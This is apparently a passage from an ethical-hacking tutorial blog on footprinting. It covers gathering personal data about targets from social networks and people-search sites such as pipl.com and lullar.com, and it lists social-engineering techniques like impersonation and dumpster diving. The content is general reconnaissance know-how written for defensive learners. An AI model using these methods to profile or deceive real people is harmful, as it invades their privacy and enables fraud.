![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-XcAkqzxd4u0/WXD0iNk0n-I/AAAAAAAAQjY/-pZkvCHm8swun4HmFnmB8OPTqExtQ-SmgCLcBGAs/s1600/7.png?w=687&ssl=1)
Footprinting through Social Networking Sites
Attackers use social networking sites like Facebook, Twitter, Pinterest, etc. to gain important and sensitive data about their target. They often create fake profiles on these social media sites to lure their target and extract sensitive information.
Employees may post personal information such as date of birth, educational and employment background, spouse’s name, etc., and information about their company such as potential clients and business partners, business trade secrets, websites, the company’s upcoming news, mergers, acquisitions, etc.
Even information about an employee’s interests is tracked, and they are then tricked into revealing more information.
Now, if you want to search for a particular person using just their name or email, there are specialized websites for it, like pipl.com and lullar.com.
Open pipl.com and type the name of the person you want to search about. For instance, I have searched my own name and as you can see in the image below we get a positive result.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-PjVi3d8x5O0/WXD0iiz-YBI/AAAAAAAAQjc/dZQ73y4MnWwSwOskmKI1jlJnsa34m2xZQCLcBGAs/s1600/8.png?w=687&ssl=1)
Now open lullar.com, here you can search for people using their email and much more. Here, I have searched through email (using my own email) and there is a positive result in the image below.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-oUGObVP3FwQ/WXD0iptIA1I/AAAAAAAAQjg/MGu80eSZluowhDgsMJ9dga9D6kArL57dACLcBGAs/s1600/9.png?w=687&ssl=1)
Footprinting through Social Engineering
Social engineering is the art of manipulating human behaviour to our own advantage. It proves most helpful when confidential information needs to be extracted. To do so, we depend on the fact that people are unaware of the value of their information and have no idea that they are being exploited. The most common example is when people call pretending to be credit/debit card companies and try to extract information.
Techniques used for social engineering are:
- Eavesdropping
- Shoulder surfing
- Dumpster diving
- Impersonation on social networking sites
This is how footprinting is done through search engines, social networking sites and social engineering. As white hat hackers, we should know about it, but we should also be aware of it and try to protect ourselves against footprinting by black hat hackers.